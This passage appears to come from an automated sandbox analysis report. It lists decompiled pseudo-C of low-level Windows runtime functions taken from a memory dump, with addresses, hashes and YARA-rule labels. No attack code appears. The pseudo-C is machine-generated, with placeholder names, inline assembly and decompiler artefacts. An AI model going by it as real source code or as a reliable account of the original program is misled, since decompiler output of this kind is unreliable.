				_v8 = _t27;
				if(_t27 != 0) {
					E045FF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E0460FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E046BAFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E046BBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E04617D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E046AFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E0460FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E046BA80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x046bea55
0x046bea66
0x046bea68
0x046bea6c
0x046bea6f
0x046bea72
0x046bea75
0x046bea7a
0x046bea7a
0x046bea7e
0x046bea80
0x046bea85
0x046bea8b
0x046beab5
0x046beabc
0x046beabf
0x046beabf
0x046beaca
0x046beace
0x046bead0
0x046beae4
0x046beaeb
0x046beaf0
0x046beaf5
0x046beb09
0x046beb0d
0x046beb1d
0x046beb2d
0x046beb38
0x046beb3d
0x046beb41
0x046beb4a
0x046beb60
0x046beb4c
0x046beb52
0x046beb59
0x046beb59
0x046beb68
0x046beb71
0x046beb71
0x046bea8d
0x046bea8f
0x046bea92
0x046bea97
0x046bea97
0x046bea9b
0x046bea9c
0x046bea9e
0x046beaa6
0x046beaa6
0x046beb7e

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 05af2e2755607275173148b8d6fbae372c6ae88350621bc321bc0ec11de2cf44
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 8B31B272604705ABD729DF24C880A9BB7AAFBC0214F04492DE59287740EF31F805CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 046769A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E046769A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x46ed360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L04606C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E04676BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E04639980() >= 0) {
							E04612280(_t56, 0x46e8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x46e8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x46e8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E045FB6F0(0x45dc338, 0x45dc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E04639520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E046395D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0460FFB0(_t68, _t77, 0x46e8778);
				}
				_pop(_t78);
				return E0463B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x046769b5
0x046769be
0x046769c3
0x046769c9
0x046769cc
0x046769d1
0x046769d3
0x046769de
0x046769e1
0x046769ea
0x046769f6
0x046769fe
0x04676a13
0x04676a14
0x04676a15
0x04676a16
0x04676a1e
0x04676a26
0x04676a31
0x04676a36
0x04676a37
0x04676a40
0x04676a49
0x04676a4a
0x04676a53
0x04676a59
0x04676a5d
0x04676a5e
0x04676a64
0x04676a67
0x04676a6a
0x04676a6d
0x04676a70
0x04676a77
0x04676a7d
0x04676a86
0x04676a89
0x04676a9c
0x04676a9f
0x04676aa2
0x04676aa5
0x04676aaf
0x04676ab1
0x04676ab8
0x04676ab9
0x04676abb
0x04676abe
0x04676ac5
0x04676ac5
0x04676aaf
0x04676a40
0x04676a26
0x046769fe
0x04676ace
0x04676ad0
0x04676ad3
0x04676ad8
0x04676adf
0x04676adf
0x04676ae8
0x04676aef
0x04676aef
0x04676af9
0x04676b06

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed35f9e611e7b11d024906c11d651ab3fd6f7d42cbb6e3ff699bca68ade14a8b
Instruction ID: 2c64e512c1bb007e89768d7126f0f5b57a3d4b30afe762b2e63a2570cf22e2a2
Opcode Fuzzy Hash: ed35f9e611e7b11d024906c11d651ab3fd6f7d42cbb6e3ff699bca68ade14a8b
Instruction Fuzzy Hash: 1A418BB1D00608AFDB24DFA5C940BFEBBF4EF48718F04862AE815A7240EB74A905CF50

Uniqueness

Uniqueness Score: -1.00%

Function 045F5210, Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E045F5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E045F52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E046395D0();
							L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0460EB70(_t54, 0x46e79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E046395D0();
								L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0460EB70(_t54, 0x46e79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0463F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0460EB70(_t54, 0x46e79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E046395D0();
							L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x045f5220
0x045f5224
0x04650d13
0x04650d16
0x04650d19
0x045f522a
0x045f522a
0x045f522d
0x045f522d
0x045f5231
0x045f5235
0x045f5239
0x04650d5c
0x04650d62
0x00000000
0x00000000
0x04650d6a
0x04650d7b
0x04650d7f
0x04650d81
0x04650d84
0x04650d95
0x04650d95
0x04650d6c
0x04650d71
0x04650d71
0x04650d9a
0x00000000
0x045f524a
0x045f524a
0x045f5250
0x04650d24
0x04650d35
0x04650d39
0x04650d3b
0x04650d3e
0x04650d50
0x04650d50
0x04650d26
0x04650d2b
0x04650d2b
0x00000000
0x04650d55
0x045f5256
0x045f525b
0x045f5265
0x04650da7
0x045f526b
0x045f526e
0x045f5272
0x04650db1
0x04650db4
0x04650dc5
0x04650dc5
0x045f5272
0x045f5278
0x045f527e
0x045f528a
0x045f528c
0x045f528d
0x00000000
0x045f5280
0x045f5282
0x045f5288
0x045f529f
0x045f5292
0x00000000
0x045f5292
0x00000000
0x045f5288
0x045f527e

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13e4dd2d543e88fa84983ea6a52390801573cdf64c1ba10ec5ee2d985eb37781
Instruction ID: 9da20ea6bdf68d81a6c9b38342edaeed8801d671027fdbaad65b322deb2c9456
Opcode Fuzzy Hash: 13e4dd2d543e88fa84983ea6a52390801573cdf64c1ba10ec5ee2d985eb37781
Instruction Fuzzy Hash: 10314432641604EBD726AF68CC80B6A77A5FF10761F118B1AE9150B2B1FB70F800EA95

Uniqueness

Uniqueness Score: -1.00%

Function 04633D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04633D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E04607B60(0, _t61, 0x45d11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E04607B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L04614620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x04633d4c
0x04633d50
0x04633d55
0x04633d5e
0x0466e79a
0x00000000
0x0466e79a
0x04633d68
0x0466e789
0x04633d9d
0x04633da3
0x04633daf
0x04633db5
0x04633dbc
0x04633dc4
0x04633dc9
0x04633dce
0x0466e7ae
0x0466e7ae
0x04633dde
0x04633de2
0x04633de7
0x04633e0d
0x04633e13
0x04633e16
0x04633e1e
0x04633e25
0x04633e28
0x00000000
0x00000000
0x04633e2a
0x04633e2f
0x04633e37
0x04633e37
0x00000000
0x04633e37
0x04633e31
0x00000000
0x04633e31
0x04633e20
0x04633e20
0x04633e35
0x00000000
0x04633de9
0x04633de9
0x04633de9
0x04633dee
0x04633dfd
0x04633dff
0x04633e02
0x04633e05
0x04633e05
0x00000000
0x04633df0
0x04633de7
0x0466e78f
0x0466e794
0x04633d79
0x04633d84
0x04633d89
0x04633d8e
0x00000000
0x0466e7a4
0x04633d96
0x04633d9a
0x00000000
0x04633d9a
0x00000000
0x0466e794
0x04633d6e
0x04633d73
0x00000000
0x0466e7b5
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42f6fb34a2cda5b9f38f4884654860d2caa788e6ce3544840f605c382bc3e151
Instruction ID: d8a532828a7af4def188d32f2bb3b8463ce4c627361c45794e238ac1d3b0e912
Opcode Fuzzy Hash: 42f6fb34a2cda5b9f38f4884654860d2caa788e6ce3544840f605c382bc3e151
Instruction Fuzzy Hash: 6B31BC35B00695DBC7298F2DC841A6BBBE5EF65711B05806EE84ACB360FB30F881D790

Uniqueness

Uniqueness Score: -1.00%

Function 0462A61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0462A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x46d0220);
				E0464D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x46e7b9c; // 0x0
				_t55 = L04614620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0464D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x46e7b10 =  *0x46e7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x46e536c; // 0x93d2f0
					if( *_t51 != 0x46e5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x46e5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x46e536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0462A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x0462a61c
0x0462a61e
0x0462a623
0x0462a628
0x0462a62b
0x0462a62d
0x0462a648
0x0462a64a
0x0462a64f
0x04669b44
0x0462a6ec
0x0462a6f1
0x0462a6f1
0x0462a655
0x0462a657
0x0462a65a
0x0462a65d
0x0462a662
0x0462a663
0x0462a667
0x0462a668
0x0462a66d
0x0462a706
0x0462a706
0x04669bda
0x04669be6
0x04669beb
0x00000000
0x04669beb
0x0462a679
0x04669b7a
0x00000000
0x04669b7a
0x0462a683
0x0462a6f4
0x0462a6f7
0x0462a6f9
0x0462a6fd
0x0462a6a0
0x0462a6a0
0x0462a6ad
0x0462a6af
0x0462a6b4
0x04669ba7
0x04669bac
0x00000000
0x00000000
0x04669bc6
0x04669bce
0x04669bd1
0x04669bd3
0x04669bd3
0x00000000
0x04669bd1
0x0462a6bd
0x0462a6c3
0x0462a6c6
0x0462a6d2
0x0462a701
0x0462a704
0x00000000
0x0462a704
0x0462a6d4
0x0462a6d6
0x0462a6d9
0x0462a6db
0x0462a6e1
0x0462a6e6
0x0462a6e8
0x0462a6e8
0x0462a6ea
0x00000000
0x0462a6ea
0x0462a688
0x0462a692
0x0462a694
0x0462a699
0x00000000
0x00000000
0x0462a69d
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5e5caa8348c16b7c599cd9ca359942af73e8f29ac83efdbb3fcef19f780686b
Instruction ID: 478c0209050ef37fb5476120785a710bed3605e181188efd0f49fbeaa8cffd19
Opcode Fuzzy Hash: d5e5caa8348c16b7c599cd9ca359942af73e8f29ac83efdbb3fcef19f780686b
Instruction Fuzzy Hash: B2416AB5A00215EFDB15CF98C980B99BBF2FB49314F148069E805AF344E7B5B901CF54

Uniqueness

Uniqueness Score: -1.00%

Function 04677016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04677016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x46ed360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04676B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E04676B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E04617D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04639AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0463B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L04614620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x04677016
0x0467701e
0x0467702b
0x04677033
0x04677037
0x0467703c
0x0467703e
0x04677041
0x04677045
0x0467704a
0x04677050
0x04677055
0x0467705a
0x04677062
0x04677062
0x0467705a
0x04677064
0x04677064
0x04677067
0x04677071
0x04677096
0x0467709b
0x046770a2
0x046770a6
0x046770a7
0x046770ad
0x046770b3
0x046770b6
0x046770bb
0x046770c3
0x046770c3
0x046770c6
0x046770cd
0x046770dd
0x046770e0
0x046770e2
0x046770e2
0x046770ee
0x04677101
0x046770f0
0x046770f9
0x046770f9
0x0467710a
0x0467710e
0x04677112
0x04677117
0x04677118
0x04677118
0x046770bb
0x0467711d
0x04677123
0x04677131
0x04677131
0x04677136
0x0467713d
0x0467713e
0x0467713f
0x0467714a
0x0467714a
0x04677084
0x04677088
0x00000000
0x0467708e
0x0467708e
0x04677092
0x00000000
0x04677092

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4bcc2c2b37b7a174f362c4f2e449118534883da5f7e5b8250c41881f9018c55
Instruction ID: ce439e5b1e30e5713be85c81b703d84b6a43d1bd2f7260b175ab84543c275240
Opcode Fuzzy Hash: d4bcc2c2b37b7a174f362c4f2e449118534883da5f7e5b8250c41881f9018c55
Instruction Fuzzy Hash: A431C2726047919BC320DF68C840A6AB7E9FF98705F084A2DF89587790F730F914CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0461C182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0461C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E04617D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E046C8D34(_v8, _t80);
					}
					E04612280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0460FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E046C8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0460FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0463B180();
						if(_a4 != 0) {
							E04612280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0461BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0461BB2D(_t16, _t15);
						E0461B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0460FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0460FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0460FFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x0461c18d
0x0461c18f
0x0461c191
0x0461c19b
0x0461c1a0
0x0461c1d4
0x0461c1de
0x04662d6e
0x0461c1e4
0x0461c1e4
0x0461c1e4
0x0461c1ec
0x04662d7d
0x04662d7d
0x0461c1f3
0x0461c1ff
0x04662d88
0x04662d8d
0x04662d94
0x04662d94
0x04662d9f
0x04662da4
0x04662dab
0x04662db0
0x04662db2
0x04662db3
0x04662db4
0x04662dbc
0x04662dc3
0x04662dc3
0x0461c205
0x0461c205
0x0461c208
0x0461c20e
0x0461c211
0x0461c216
0x0461c219
0x0461c21f
0x0461c222
0x0461c22c
0x0461c234
0x0461c23a
0x0461c23f
0x0461c245
0x0461c24b
0x0461c251
0x0461c25a
0x0461c276
0x0461c27d
0x0461c27d
0x0461c25c
0x0461c25c
0x00000000
0x0461c25e
0x0461c1a4
0x0461c1aa
0x0461c1b3
0x0461c265
0x0461c26c
0x0461c26c
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 76a4d2011c1999da771bd7eda6db6b1aaac18004c9e1cf3fbcfb5a3415a99a8e
